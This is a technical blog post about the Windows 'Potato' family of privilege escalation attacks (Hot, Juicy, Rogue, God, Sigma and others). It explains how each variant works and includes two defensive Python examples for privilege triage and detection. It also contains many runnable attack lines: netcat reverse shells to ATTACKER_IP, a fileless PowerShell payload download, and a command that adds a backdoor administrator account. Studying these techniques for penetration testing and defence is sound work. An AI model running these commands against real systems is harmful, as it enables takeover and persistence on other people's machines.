The Potato Family — Windows Privilege Escalation (2016–2024)
TL;DR
Potato attacks exploit Windows service accounts that hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. The core technique forces a privileged process (usually SYSTEM) to authenticate to an attacker-controlled server via NTLM, then impersonates the captured token to spawn a SYSTEM shell. Since 2016, over a dozen variants have emerged — each bypassing a specific Microsoft patch or restriction. This post maps the entire family: how each variant works, why the previous one stopped working, and when to use which.
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ YOU ARE HERE ──► SYSTEM SHELL │
│ (IIS AppPool, (NT AUTHORITY\SYSTEM) │
│ MSSQL Service, │
│ any svc account) │
│ │
│ Requirement: SeImpersonatePrivilege or SeAssignPrimaryTokenPriv │
│ │
└─────────────────────────────────────────────────────────────────────┘
Foundations — Why Potato Attacks Exist
Before diving into individual variants, it is essential to understand the Windows mechanisms that make this entire attack class possible.
Windows Access Tokens
Every process in Windows runs under a security context defined by an access token. This token contains the user’s SID, group memberships, and privileges. When a process needs to act on behalf of another user, it can impersonate that user’s token — effectively assuming their identity and privileges.
There are four levels of impersonation in Windows [1]:
| Level | Description |
|---|---|
| Anonymous | Server cannot identify or impersonate the client |
| Identify | Server can identify the client but cannot impersonate |
| Impersonate | Server can impersonate the client on the local system |
| Delegate | Server can impersonate the client on remote systems |
Potato attacks target the Impersonate level — they trick a SYSTEM-level process into authenticating, capture its token at impersonation level, and use it to spawn a new process.
SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege
These two privileges are the gatekeepers of token impersonation [2]:
- SeImpersonatePrivilege — Allows a process to impersonate a client after authentication. Granted by default to service accounts (IIS, MSSQL, etc.).
- SeAssignPrimaryTokenPrivilege — Allows a process to assign a primary token to a new process. Used with CreateProcessAsUser().
You can check if a compromised account holds these privileges:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Windows\system32> whoami /priv │
│ │
│ PRIVILEGES INFORMATION │
│ ---------------------- │
│ │
│ Privilege Name Description State │
│ ============================= ================================ ========= │
│ SeImpersonatePrivilege Impersonate a client Enabled │
│ SeAssignPrimaryTokenPrivilege Replace a process level token Enabled │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
If either privilege is present, the account is a candidate for Potato attacks.
Service accounts that typically hold these privileges by default:
| Account | SeImpersonate | SeAssignPrimaryToken |
|---|---|---|
| IIS APPPOOL\DefaultAppPool | Yes | Yes |
| NT AUTHORITY\LOCAL SERVICE | Yes | Yes |
| NT AUTHORITY\NETWORK SERVICE | Yes | Yes |
| MSSQL Service Accounts | Yes | Yes |
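The check above is usually run on a box you have a shell on, but the same triage is often done later on captured output. The following is an added example (not from the original post) that parses a whoami /priv listing and applies the rule stated here: either privilege being present is enough, whatever its State column says. The sample listings are constructed, modelled on the app-pool output shown further down in this post.

```python
"""Added example (not from the post): triage a captured `whoami /priv`
listing for the two privileges the Potato family needs. Presence is what
matters, not the State column: a privilege shown as Disabled is still in
the token and can be enabled by the process that holds it."""
import re

# The two gatekeeper privileges discussed in the post.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample modelled on the IIS app-pool output in the post:
# one privilege Enabled, the other present but Disabled.
APPPOOL_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Constructed sample for a hardened account that holds neither privilege.
RESTRICTED_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_ROW = re.compile(r"^(Se\w+)\s+(.+?)\s+(Enabled|Disabled)$")


def parse_privs(text):
    """Map each privilege name in the listing to its State string."""
    privs = {}
    for raw in text.splitlines():
        match = PRIV_ROW.match(raw.strip())
        if match:
            privs[match.group(1)] = match.group(3)
    return privs


def assess(text):
    """Report whether the account is a Potato candidate and why.

    An account qualifies as soon as either privilege is present; the
    per-privilege State is returned only as context for the analyst.
    """
    privs = parse_privs(text)
    held = sorted(POTATO_PRIVS & privs.keys())
    return {
        "candidate": bool(held),
        "held": {name: privs[name] for name in held},
    }


if __name__ == "__main__":
    for label, output in (("app pool", APPPOOL_OUTPUT), ("restricted", RESTRICTED_OUTPUT)):
        print(label, assess(output))
```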
Identifying Target Architecture
Before downloading any exploit binary, check the target architecture:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\> wmic os get osarchitecture │
│ OSArchitecture │
│ 64-bit │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
This determines whether to use x86 or x64 builds of the tools.
DCOM, OXID Resolution, and NTLM Authentication
Most Potato variants abuse the Distributed Component Object Model (DCOM) infrastructure — specifically, how Windows resolves COM object locations through the OXID Resolver service on port 135 [3].
The attack flow at the protocol level:
- The attacker instantiates a COM object with a specific CLSID, directing it to authenticate against an attacker-controlled endpoint.
- The COM subsystem (running as SYSTEM) attempts to resolve the object location via the OXID Resolver.
- During this resolution, SYSTEM sends an NTLM authentication request to the attacker.
- The attacker captures the NTLM token and uses it to impersonate SYSTEM.
This mechanism — forcing a privileged process to authenticate to an attacker-controlled listener — is the foundation of nearly every Potato variant.
Named Pipes and Token Capture
Several variants use Named Pipes as the authentication endpoint instead of a network listener [4]. When a privileged client connects to a named pipe, the pipe server can call ImpersonateNamedPipeClient() to assume the client’s security context. This avoids network-level restrictions entirely and works even when all outbound ports are blocked.
Unified Attack Flow
Despite their differences, all Potato attacks share a common core pattern. The following diagram illustrates the shared flow and where each variant diverges:
┌──────────────────────────────────────────────────────────────────────────────┐
│ POTATO ATTACK — CORE FLOW │
└──────────────────────────────────────────────────────────────────────────────┘
┌────────────────┐ ┌────────────────────┐ ┌────────────────────┐
│ Low-Priv │ │ Windows OS │ │ SYSTEM │
│ Service │ │ (DCOM/RPC) │ │ Token │
│ Account │ │ │ │ │
│ │ │ │ │ │
│ SeImpersonate │ │ │ │ │
│ Privilege │ │ │ │ │
└───────┬────────┘ └─────────┬──────────┘ └─────────┬──────────┘
│ │ │
│ 1. Trigger DCOM/RPC │ │
│ ─────────────────────────►│ │
│ │ │
│ 2. Force NTLM Auth │ │
│◄───────────────────────── │ │
│ │ │
│ 3. Capture/Relay Token │
│ ───────────────────────────────────────────────────────►│
│ │ │
│ 4. Impersonate SYSTEM │
│◄────────────────────────────────────────────────────────│
│ │ │
┌────▼────────┐
│ SYSTEM │
│ Shell │
└─────────────┘
┌──────────────────────────────────────────────────────────────────────────────┐
│ WHERE EACH VARIANT DIVERGES: │
│ │
│ Step 1 (Trigger) │ Step 2 (Auth) │ Step 3 (Relay) │
│ ────────────────────────┼───────────────────────┼────────────────────────── │
│ Hot: NBNS + WPAD │ HTTP NTLM │ HTTP → SMB │
│ Rotten: DCOM BITS │ DCOM NTLM │ TCP Sockets │
│ Juicy: Custom CLSID │ DCOM NTLM │ COM Server │
│ Rogue: Fake OXID │ RPC NTLM │ Named Pipe │
│ Sweet: Multi-vector │ DCOM NTLM │ Named Pipe │
│ God: Named Pipe RPC │ RPC NTLM │ Direct Pipe │
│ Silver: DCOM Exploit │ NTLM Relay │ Cross-Session │
└─────────────────────────┴───────────────────────┴───────────────────────────┘
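Whatever the trigger in step 1, every row in the table ends the same way: a process owned by a service account produces a child running as SYSTEM. That shared invariant is what a defender can alert on. The following is an added example (not part of the original post) that applies that rule to process-creation records. The records are constructed in the shape of Sysmon Event ID 1 fields; the ParentUser field and the NT SERVICE\MSSQL prefix for SQL Server virtual accounts are assumptions, and in a real pipeline the parent's user would be joined from the parent's own creation event if the sensor does not supply it.

```python
"""Added example (not from the post): flag the parent-to-child identity
jump that every Potato variant ends with. A child running as SYSTEM whose
parent runs as one of the default SeImpersonate service accounts is the
"service account -> SYSTEM shell" transition from the core flow."""

SYSTEM = "NT AUTHORITY\\SYSTEM"

# Accounts the post lists as holding SeImpersonatePrivilege by default.
# Compared case-insensitively because whoami prints them in lower case.
# The NT SERVICE\MSSQL prefix (SQL Server virtual accounts) is an assumption.
SERVICE_ACCOUNT_PREFIXES = (
    "IIS APPPOOL\\",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
    "NT SERVICE\\MSSQL",
)

# Parent images living in user-writable locations raise the severity:
# a legitimate SYSTEM-spawning parent should not be running from here.
WRITABLE_PREFIXES = ("C:\\TEMP\\", "C:\\WINDOWS\\TEMP\\", "C:\\USERS\\", "C:\\INETPUB\\")


def is_service_account(user):
    """True if the account is one of the default SeImpersonate holders."""
    return user.upper().startswith(SERVICE_ACCOUNT_PREFIXES)


def identity_jump(event):
    """Return an alert dict if a service-account parent produced a SYSTEM child."""
    parent_user = event.get("ParentUser", "")
    child_user = event.get("User", "")
    if not (is_service_account(parent_user) and child_user.upper() == SYSTEM):
        return None
    parent_image = event.get("ParentImage", "")
    severity = "high" if parent_image.upper().startswith(WRITABLE_PREFIXES) else "medium"
    return {
        "severity": severity,
        "parent": parent_image,
        "parent_user": parent_user,
        "child": event.get("Image", ""),
    }


def detect(events):
    """Run the rule over a batch of process-creation records."""
    return [alert for alert in (identity_jump(e) for e in events) if alert]


# Constructed sample events in Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    # Benign: the IIS worker spawns a child as the app-pool identity.
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "User": "IIS APPPOOL\\DefaultAppPool",
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    # Suspicious: a tool in C:\Temp, run by the app-pool user, spawns cmd.exe as SYSTEM.
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "User": "nt authority\\system",
     "ParentImage": "C:\\Temp\\JuicyPotato.exe",
     "ParentUser": "iis apppool\\defaultapppool"},
    # Benign: SYSTEM spawning SYSTEM is the normal service-host pattern.
    {"Image": "C:\\Windows\\System32\\svchost.exe",
     "User": SYSTEM,
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "ParentUser": SYSTEM},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Legitimate SYSTEM children of service accounts are rare but not unheard of, so treat a "medium" hit as something to review rather than block outright.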
The Potato Timeline
The evolution of Potato attacks reflects a decade-long cat-and-mouse game between researchers and Microsoft. Each patch prompted a new bypass, each bypass prompted a new restriction:
2016 2018 2020 2021–2022 2023–2024
│ │ │ │ │
▼ ▼ ▼ ▼ ▼
┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────────┐ ┌──────────┐
│ Hot │ │ Juicy │ │ Rogue │ │ God │ │ Silver │
│ Potato │ │ Potato │ │ Potato │ │ Potato │ │ Potato │
│NBNS+WPAD │ │ CLSID │ │Fake OXID │ │ Named Pipe │ │NTLM Relay│
└────┬─────┘ └────┬─────┘ └────┬─────┘ └──────┬───────┘ └──────────┘
│ │ │ │
┌────┴─────┐ │ ┌────┴─────┐ ┌───────┴────────┐
│ Rotten │ │ │ Sweet │ │ Coerced │
│ Potato │ MS patched │ Potato │ │ Potato (2023) │
│DCOM BITS │ DCOM on │Multi-vec │ │ RPC Coercion │
└──────────┘ Server 2019+ └──────────┘ └───────┬────────┘
│
┌──────────┐ ┌───────┴────────┐
│ Generic │ │ Sigma │
│ Potato │ │ Potato (2023) │
│HTTP+Pipe │ │ GodPotato fork│
│ (2021) │ └────────────────┘
└──────────┘
┌────────────────┐
│ JuicyPotatoNG │
│ SSPI+Kerberos │
│ (2022) │
└────────────────┘
Comparative Table
The following table summarizes every major variant, its mechanism, requirements, and current patch status:
| Variant | Year | CVE | Mechanism | Privilege Required | Windows Versions | Patched? | Tool |
|---|---|---|---|---|---|---|---|
| Hot Potato | 2016 | — | NBNS Spoofing + WPAD + NTLM Relay | SeImpersonate | 7, 8, 10, Server 2008/2012 | Yes | Tater |
| Rotten Potato | 2016 | — | DCOM BITS + NTLM Relay via TCP Sockets | SeImpersonate | 7, 8, 10, Server 2008/2012 | Partial | RottenPotatoNG |
| Juicy Potato | 2018 | — | Custom CLSID + DCOM Activation | SeImpersonate | 7, 8, 10, Server 2008/2012/2016 | Yes (2019+) | JuicyPotato |
| Rogue Potato | 2020 | — | Fake OXID Resolver + Named Pipe | SeImpersonate | All (requires outbound port) | No | RoguePotato |
| Sweet Potato | 2020 | — | Multi-vector (DCOM/WinRM/EfsRpc) + Named Pipe | SeImpersonate | 10, Server 2016/2019 | Partial | SweetPotato |
| Generic Potato | 2021 | — | HTTP + Named Pipe impersonation | SeImpersonate | All | No | GenericPotato |
| JuicyPotatoNG | 2022 | — | DCOM + SSPI Hooking + Kerberos Relay | SeImpersonate | 10, 11, Server 2019/2022 | No | JuicyPotatoNG |
| God Potato | 2022 | — | Named Pipe RPC + OXID bypass | SeImpersonate | All (2012–2022) | No | GodPotato |
| Coerced Potato | 2023 | — | RPC Coercion + Named Pipe | SeImpersonate | All | No | CoercedPotato |
| Sigma Potato | 2023 | — | Named Pipe RPC + Hooking (GodPotato fork) | SeImpersonate | 8–11, Server 2012–2022 | No | SigmaPotato |
| Silver Potato | 2024 | CVE-2024-38061 | DCOM Cross-Session + NTLM Relay | Session Access | All | Partial | Research/PoC |
Decision Flowchart — Which Potato to Use
Choosing the right variant depends on the Windows version, available privileges, and network constraints. The following flowchart provides a practical decision guide:
┌─────────────────────────────┐
│ Have SeImpersonate or │
│ SeAssignPrimaryToken? │
└──────────────┬──────────────┘
│
┌─────────▼─────────┐
│ Yes │──── No ───► Not vulnerable
└─────────┬─────────┘ to Potato attacks
│
┌──────────────▼──────────────┐
│ Windows Version? │
└──────────────┬──────────────┘
│
┌───────────────────────┼───────────────────────┐
▼ ▼ ▼
┌─────────────────────┐ ┌─────────────────────┐ ┌─────────────────────┐
│ Windows 7/10 │ │ Server 2019 │ │ Server 2022+ │
│ Server <= 2016 │ │ Windows 10 │ │ Windows 11 │
│ │ │ (post-patch) │ │ │
└──────────┬──────────┘ └──────────┬──────────┘ └──────────┬──────────┘
│ │ │
▼ │ ▼
┌─────────────────────┐ │ ┌─────────────────────┐
│ JuicyPotato │ │ │ GodPotato │
│ (easiest, │ │ │ SigmaPotato │
│ most stable) │ │ │ CoercedPotato │
└─────────────────────┘ │ │ JuicyPotatoNG │
│ └─────────────────────┘
┌──────────────▼──────────────┐
│ Can open outbound port? │
│ (e.g., port 135) │
└──────────────┬──────────────┘
│
┌──────────────┼──────────────┐
▼ ▼
┌─────────────────┐ ┌─────────────────┐
│ Yes │ │ No │
│ RoguePotato │ │ GodPotato │
│ │ │ SigmaPotato │
└─────────────────┘ │ SweetPotato │
└─────────────────┘
│
┌────────▼────────┐
│ Need stealth? │
└────────┬────────┘
Yes ─────┤
▼
┌─────────────────┐
│ SigmaPotato │
│ (fileless + │
│ built-in │
│ revshell) │
└─────────────────┘
Obtaining the Tools
Most Potato binaries are available as pre-compiled releases on GitHub. On Kali Linux, JuicyPotato is bundled:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ ls /usr/share/windows-resources/juicy-potato/ │
│ JuicyPotato.exe │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
For other tools, download the release matching the target architecture (x86 or x64):
| Tool | GitHub Releases |
|---|---|
| JuicyPotato | ohpe/juicy-potato/releases |
| GodPotato | BeichenDream/GodPotato/releases |
| SweetPotato | CCob/SweetPotato/releases |
| RoguePotato | antonioCoco/RoguePotato/releases |
| JuicyPotatoNG | antonioCoco/JuicyPotatoNG/releases |
| CoercedPotato | Prepouce/CoercedPotato/releases |
| SigmaPotato | tylerdotrar/SigmaPotato/releases |
The Variants — Deep Dive
Hot Potato (2016)
Author: Stephen Breen (FoxGlove Security) [5]
Hot Potato was the first exploit in the family. It combined three well-known techniques into a single local privilege escalation chain:
- NBNS Spoofing — Floods the local network with NBNS responses to redirect name resolution for the WPAD host to the attacker’s IP.
- Fake WPAD Proxy — Serves a malicious wpad.dat file that forces the system to send HTTP requests through the attacker’s proxy.
- HTTP-to-SMB NTLM Relay — Captures the NTLM authentication from the proxied request and relays it to the local SMB service to execute a command as SYSTEM.
Why it worked: Windows services (like Windows Update) would automatically attempt WPAD resolution and send NTLM credentials to any proxy that requested them.
Why it died: Microsoft patched the NBNS spoofing vector and hardened WPAD resolution behavior. Modern Windows versions no longer fall for local NBNS poisoning in the same way.
Rotten Potato (2016)
Authors: Stephen Breen, Chris Mallz [6]
Rotten Potato shifted the attack from network-level spoofing to DCOM-based NTLM reflection. Instead of intercepting proxy traffic, it:
- Triggers a DCOM activation request using the BITS (Background Intelligent Transfer Service) COM object via CoGetInstanceFromIStorage.
- Intercepts the NTLM authentication via a local man-in-the-middle between a TCP listener (port 6666) and the Windows RPC service (port 135).
- Relays the NTLM negotiation and impersonates SYSTEM via AcceptSecurityContext/ImpersonateSecurityContext.
Why it worked: DCOM activation requests are made by SYSTEM-level processes, and the NTLM tokens could be relayed locally between TCP sockets.
Why it died: Microsoft added restrictions to prevent NTLM reflection on the same machine and tightened DCOM activation security.
Juicy Potato (2018)
Authors: Andrea Pierini (decoder), Giuseppe Trotta (ohpe) [7]
Juicy Potato was the breakthrough variant — it generalized Rotten Potato by allowing the attacker to specify any CLSID (COM class identifier) for the DCOM activation trigger. This meant:
- The attacker could choose from hundreds of COM objects that run as SYSTEM.
- Different CLSIDs work on different Windows versions, making the attack highly versatile.
- The attacker controls the listening port for the NTLM authentication callback.
Basic usage:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe │
│ -a "/c whoami" -t * │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotato.exe -l 1337 -p C:\Windows\Temp\nc.exe │
│ -a "-e cmd.exe ATTACKER_IP 4444" -t * │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
With specific CLSID:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * │
│ -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Different Windows versions require different CLSIDs. The following table lists commonly working ones:
| OS | CLSID |
|---|---|
| Windows 10 | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} |
| Windows Server 2016 | {8BC3F05E-D86B-11D0-A075-00C04FB68820} |
| Windows Server 2012 | {e60687f7-01a1-40aa-86ac-db1cbf673334} |
A complete list of CLSIDs per OS version is available at the JuicyPotato CLSID reference [7].
Why it worked: Hundreds of COM objects across Windows versions could be abused as NTLM authentication triggers, and Microsoft had no centralized fix.
Why it died: Starting with Windows Server 2019 and Windows 10 build 1809, Microsoft blocked DCOM activation on custom ports by restricting the OXID resolver to only accept connections on port 135 — which is already bound by the legitimate RPC service.
Rogue Potato (2020)
Authors: Andrea Pierini (decoder), Antonio Cocomazzi [8]
Rogue Potato bypassed the Server 2019 restrictions by deploying a fake OXID Resolver on a remote machine controlled by the attacker:
- The attacker sets up a fake OXID Resolver on a remote server (or uses port forwarding).
- Triggers a DCOM activation request that resolves the OXID through the remote fake resolver.
- The fake resolver redirects the SYSTEM authentication back to a local named pipe.
- The named pipe server captures the SYSTEM token.
Why it worked: By moving the OXID resolution off-machine, it bypassed the local port 135 restriction. The SYSTEM token was still captured locally via named pipe impersonation.
Attacker machine — redirect port 135 to victim’s listener:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ socat tcp-listen:135,reuseaddr,fork │
│ tcp:TARGET_IP:9999 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim machine — execute the exploit:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> RoguePotato.exe -r ATTACKER_IP -l 9999 │
│ -e "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Limitation: Requires the ability to redirect traffic from port 135 on a remote machine to the attacker, which is not always feasible in restricted network environments.
Sweet Potato (2020)
Author: Ceri Coburn (CCob) [9]
Sweet Potato combined multiple techniques into a single tool:
- DCOM activation abuse (similar to Rotten/Juicy Potato).
- WinRM service abuse to trigger NTLM authentication.
- EfsRpc coercion for SYSTEM authentication.
- PrintSpoofer named pipe impersonation.
- Named pipe impersonation for token capture.
It serves as a “Swiss army knife” that tries multiple trigger methods, increasing the chances of success across different Windows configurations.
Execute command:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SweetPotato.exe -p C:\Windows\System32\cmd.exe │
│ -a "/c whoami" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SweetPotato.exe -p C:\Windows\Temp\nc.exe │
│ -a "-e cmd.exe ATTACKER_IP 4444" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Generic Potato (2021)
Author: Micah Van Deusen [19]
Generic Potato takes a different angle — instead of abusing DCOM or RPC, it exploits HTTP-based authentication combined with Named Pipe impersonation:
- Starts a local HTTP server that triggers NTLM authentication.
- Redirects a privileged process to authenticate against the HTTP endpoint.
- Captures the token and impersonates via named pipe.
Why it matters: Useful in scenarios where DCOM is locked down but HTTP-based coercion is available. Works on all Windows versions since it avoids the DCOM activation path entirely.
Basic usage:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GenericPotato.exe -m HTTP -p C:\Windows\Temp\nc.exe │
│ -a "ATTACKER_IP 4444 -e cmd.exe" -e HTTP │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
JuicyPotatoNG (2022)
Authors: Antonio Cocomazzi, Andrea Pierini (decoder-it) [18]
JuicyPotatoNG is the successor to JuicyPotato, designed to work on Windows 10/11 and Server 2019/2022 — the exact versions where JuicyPotato was patched:
- Hooks into the SSPI (Security Support Provider Interface) to intercept authentication at the API level.
- Uses Kerberos relay within the local authentication flow.
- Captures and impersonates the SYSTEM token.
Unlike the original JuicyPotato, it does not require choosing a CLSID — it automatically finds a working COM object.
Basic usage:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe │
│ -a "/c C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd.exe" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Why it matters: Drop-in replacement for JuicyPotato on modern Windows. No CLSID hunting, no port forwarding, works where the original was patched.
God Potato (2022)
Author: BeichenDream [10]
God Potato took a fundamentally different approach by abusing the Named Pipe mechanism directly, bypassing the need for DCOM activation entirely:
- Creates a named pipe server.
- Uses RPC calls to trigger SYSTEM-level authentication to the named pipe.
- Impersonates the SYSTEM token from the pipe connection.
Why it matters: God Potato works on nearly all Windows versions from Server 2012 to Server 2022, does not require any outbound network access, and bypasses all DCOM-related patches.
Prerequisite — .NET Framework 2.0, 3.5, or 4.0:
GodPotato provides separate binaries for each .NET version (GodPotato-NET2.exe, GodPotato-NET35.exe, GodPotato-NET4.exe). Choose the one matching the target:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> reg query "HKLM\SOFTWARE\Microsoft\NET Framework │
│ Setup\NDP" /s | findstr /i "version" │
│ │
│ Version REG_SZ 2.0.50727.4927 │
│ Version REG_SZ 3.5.30729.4926 │
│ Version REG_SZ 4.8.04084 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Execute command:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GodPotato.exe -cmd "cmd /c whoami" │
│ [*] CombaseModule: 0x140000000 │
│ [*] DispatchTable: 0x140000000 │
│ [*] UseProtseqFunction: 0x140000000 │
│ [*] UseProtseqFunctionParamCount: 6 │
│ [*] ImpsersonateClient: OK │
│ [*] Token: OK │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GodPotato.exe -cmd "C:\Windows\Temp\nc.exe │
│ -e cmd.exe ATTACKER_IP 4444" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Add admin user:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GodPotato.exe -cmd "net user backdoor P@ssw0rd /add │
│ && net localgroup administrators backdoor /add" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Coerced Potato (2023)
Authors: Prepouce, Hack0ura [11]
Coerced Potato leverages multiple RPC coercion techniques to force SYSTEM authentication to a named pipe. It aggregates several known RPC interfaces (similar to PetitPotam, PrinterBug, etc.) but targets local privilege escalation instead of remote relay:
- Uses EfsRpcOpenFileRaw, SpoolService, and other RPC methods.
- Triggers SYSTEM-level authentication to an attacker-controlled named pipe.
- Impersonates the captured token.
Sigma Potato (2023)
Author: Tyler McCann (tylerdotrar) [17]
Sigma Potato is a fork of GodPotato that shares the same underlying Named Pipe RPC exploitation technique but adds significant operational improvements for real-world engagements:
- Fileless execution — Full .NET reflection support, allowing the binary to be loaded and executed entirely in memory without touching disk.
- Built-in reverse shell — Native --revshell flag, no need for external tools like netcat.
- Command length bypass — Overcomes GodPotato’s 1024-character limit via process environment block inheritance (up to 32,767 characters).
- PowerShell wrapper — Invoke-SigmaPotato.ps1 with embedded Gzip+Base64 binary for single-file deployment.
- AV evasion — Rudimentary heuristics bypass via VirtualAllocExNuma() call.
Two binaries are provided: SigmaPotato.exe (.NET 4.8) and SigmaPotatoCore.exe (.NET 2.0/3.5).
Basic execution:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SigmaPotato.exe whoami │
│ [*] SigmaPotato by @tylerdotrar │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Built-in reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SigmaPotato.exe --revshell ATTACKER_IP 4444 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Fileless execution via .NET reflection (no binary on disk):
┌─────────────────────────────────────────────────────────────────────────────┐
│ Windows PowerShell _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ PS C:\> [System.Reflection.Assembly]::Load( │
│ (New-Object Net.WebClient).DownloadData( │
│ 'http://ATTACKER_IP/SigmaPotato.exe')) │
│ │
│ PS C:\> [SigmaPotato]::Main("whoami") │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Why it matters: Same exploitation power as GodPotato, but designed for stealth — fileless execution makes it harder to detect, and the built-in reverse shell eliminates the need to transfer additional tools like netcat.
Silver Potato (2024)
Author: Andrea Pierini (decoder) [12]
Silver Potato introduced a new attack surface — cross-session DCOM activation combined with NTLM relay:
- Exploits DCOM object activation permissions that allow cross-session access.
- Forces a privileged process to authenticate via NTLM to an attacker-controlled endpoint across sessions.
- Relays the captured NTLM authentication to escalate privileges.
The author initially explored Kerberos relay as an attack path, but it proved unsuccessful due to impersonation level limitations (only “Identify” level on the second authentication, which is unusable for relay). The working exploit relies on NTLM relay.
CVE: CVE-2024-38061
Related: Non-Potato Alternatives
The following tools are not part of the Potato family but exploit the same SeImpersonatePrivilege to achieve SYSTEM. They are commonly used in the same scenarios and are worth knowing as alternatives when Potato variants fail or are impractical.
PrintSpoofer
Author: Itm4n [16]
PrintSpoofer abuses the Windows Print Spooler service instead of DCOM/RPC. It creates a named pipe with a predictable name that the spooler service will connect to as SYSTEM, then impersonates the captured token.
The approach is simpler than most Potato variants — no COM objects, no OXID resolution, no network listeners:
